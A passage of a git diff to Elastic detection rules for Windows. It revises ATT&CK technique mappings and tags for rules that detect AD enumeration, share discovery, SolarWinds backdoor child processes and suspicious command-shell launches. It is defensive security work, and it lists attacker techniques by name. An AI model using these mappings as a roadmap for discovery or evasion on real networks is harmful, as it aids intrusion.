"https://attack.mitre.org/techniques/T1087/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/windows/discovery_ad_explorer_execution.toml b/rules/windows/discovery_ad_explorer_execution.toml index 7b4a261ca72..52e76151aca 100644 --- a/rules/windows/discovery_ad_explorer_execution.toml +++ b/rules/windows/discovery_ad_explorer_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/01" [rule] author = ["Elastic"] @@ -83,33 +83,44 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique.subtechnique]] id = "T1069.002" name = "Domain Groups" reference = "https://attack.mitre.org/techniques/T1069/002/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" + [[rule.threat.technique]] id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/windows/discovery_adfind_command_activity.toml b/rules/windows/discovery_adfind_command_activity.toml index eb934734102..154f036722d 100644 --- a/rules/windows/discovery_adfind_command_activity.toml +++ b/rules/windows/discovery_adfind_command_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -104,6 +104,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" [[rule.threat.technique]] id = "T1018" @@ -114,28 +118,30 @@ reference = "https://attack.mitre.org/techniques/T1018/" id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique.subtechnique]] id = "T1069.002" name = "Domain Groups" reference = "https://attack.mitre.org/techniques/T1069/002/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" + [[rule.threat.technique]] id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/windows/discovery_command_system_account.toml b/rules/windows/discovery_command_system_account.toml index 98ab72dd698..03d5ecdf531 100644 --- a/rules/windows/discovery_command_system_account.toml +++ b/rules/windows/discovery_command_system_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/20" [rule] author = ["Elastic"] @@ -55,7 +55,16 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -87,18 +96,31 @@ not (process.parent.name : "cmd.exe" and process.working_directory : "C:\\Progra [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" -[[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml index ef606a7f6e7..885e2d7cfcf 100644 --- a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml +++ b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/27" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -93,13 +93,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" [[rule.threat.technique]] id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/windows/discovery_high_number_ad_properties.toml b/rules/windows/discovery_high_number_ad_properties.toml index 9bb71b502f5..ba1b6f16be2 100644 --- a/rules/windows/discovery_high_number_ad_properties.toml +++ b/rules/windows/discovery_high_number_ad_properties.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/29" integration = ["windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -85,28 +85,14 @@ any where host.os.type == "windows" and event.code == "4662" and not winlog.even [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" - -[[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" - -[[rule.threat.technique.subtechnique]] -id = "T1087.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1087/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/windows/discovery_host_public_ip_address_lookup.toml b/rules/windows/discovery_host_public_ip_address_lookup.toml index 5db11daaac7..70ce393aac1 100644 --- a/rules/windows/discovery_host_public_ip_address_lookup.toml +++ b/rules/windows/discovery_host_public_ip_address_lookup.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -55,7 +55,19 @@ references = ["https://attack.mitre.org/techniques/T1016/"] risk_score = 73 rule_id = "642ce354-4252-4d43-80c9-6603f16571c1" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -119,18 +131,31 @@ network where host.os.type == "windows" and dns.question.name != null and proces [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" -[[rule.threat.technique.subtechnique]] -id = "T1016.001" -name = "Internet Connection Discovery" -reference = "https://attack.mitre.org/techniques/T1016/001/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/discovery_posh_invoke_sharefinder.toml b/rules/windows/discovery_posh_invoke_sharefinder.toml index b0a36b60dc8..71301265659 100644 --- a/rules/windows/discovery_posh_invoke_sharefinder.toml +++ b/rules/windows/discovery_posh_invoke_sharefinder.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/17" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -114,7 +114,16 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" @@ -137,16 +146,51 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1039" +name = "Data from Network Shared Drive" +reference = "https://attack.mitre.org/techniques/T1039/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/discovery_posh_suspicious_api_functions.toml b/rules/windows/discovery_posh_suspicious_api_functions.toml index 4ab7a7dd03b..4fa1272e100 100644 --- a/rules/windows/discovery_posh_suspicious_api_functions.toml +++ b/rules/windows/discovery_posh_suspicious_api_functions.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/13" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -106,7 +106,16 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" @@ -156,41 +165,25 @@ case_insensitive = true value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" reference = "https://attack.mitre.org/techniques/T1069/001/" -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1087/001/" -[[rule.threat.technique.subtechnique]] -id = "T1087.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1087/002/" [[rule.threat.technique]] id = "T1135" @@ -202,10 +195,46 @@ id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1039" +name = "Data from Network Shared Drive" +reference = "https://attack.mitre.org/techniques/T1039/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/discovery_whoami_command_activity.toml b/rules/windows/discovery_whoami_command_activity.toml index 14d4432265c..0c166da5fd0 100644 --- a/rules/windows/discovery_whoami_command_activity.toml +++ b/rules/windows/discovery_whoami_command_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "system", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -117,18 +117,14 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" -[[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml index d025ed0e6f3..74799bd0dbd 100644 --- a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml +++ b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -67,7 +67,21 @@ references = [ risk_score = 47 rule_id = "d72e33fc-6e91-42ff-ac8b-e573268c5a87" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -86,12 +100,10 @@ process.parent.name: ( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -102,7 +114,27 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" +[[rule.threat.technique.subtechnique]] +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml index 59cb3fe1d9f..548fd088051 100644 --- a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml +++ b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -57,7 +57,16 @@ references = [ risk_score = 47 rule_id = "93b22c0a-06a0-4131-b830-b10d5e166ff4" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -87,36 +96,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" - [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_com_object_xwizard.toml b/rules/windows/execution_com_object_xwizard.toml index fa047e4e93e..c7deeed356b 100644 --- a/rules/windows/execution_com_object_xwizard.toml +++ b/rules/windows/execution_com_object_xwizard.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [rule] author = ["Elastic"] @@ -67,7 +67,20 @@ references = [ risk_score = 47 rule_id = "1a6075b0-7479-450e-8fe7-b8b8438ac570" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -92,31 +105,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" - [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml index f9e4f0e18a5..764af8ffaf6 100644 --- a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml +++ b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/23" [rule] author = ["Elastic"] @@ -100,7 +100,16 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 21 rule_id = "89f9a4b0-9f8f-4ee0-8823-c4751a6d6696" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", +] type = "eql" query = ''' @@ -125,39 +134,29 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_command_shell_started_by_svchost.toml b/rules/windows/execution_command_shell_started_by_svchost.toml index 96e430f08d1..6424adbe5c9 100644 --- a/rules/windows/execution_command_shell_started_by_svchost.toml +++ b/rules/windows/execution_command_shell_started_by_svchost.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/29" [transform] [[transform.osquery]] @@ -132,31 +132,17 @@ not process.args:(".\inetsrv\iissetup.exe /keygen " or "C:\Program" or "C:\Progr [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["process.command_line"] diff --git a/rules/windows/execution_command_shell_started_by_unusual_process.toml b/rules/windows/execution_command_shell_started_by_unusual_process.toml index 3dc455db3cd..3db3ebe2ccf 100644 --- a/rules/windows/execution_command_shell_started_by_unusual_process.toml +++ b/rules/windows/execution_command_shell_started_by_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -114,18 +114,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/execution_command_shell_via_rundll32.toml b/rules/windows/execution_command_shell_via_rundll32.toml index b4ad329ff0c..c0273819d72 100644 --- a/rules/windows/execution_command_shell_via_rundll32.toml +++ b/rules/windows/execution_command_shell_via_rundll32.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -58,7 +58,20 @@ RunDLL32 is a legitimate Windows utility used to execute functions in DLLs, ofte risk_score = 21 rule_id = "9ccf3ce0-0057-440a-91f5-870c6ad39093" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -74,30 +87,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -108,7 +101,39 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured 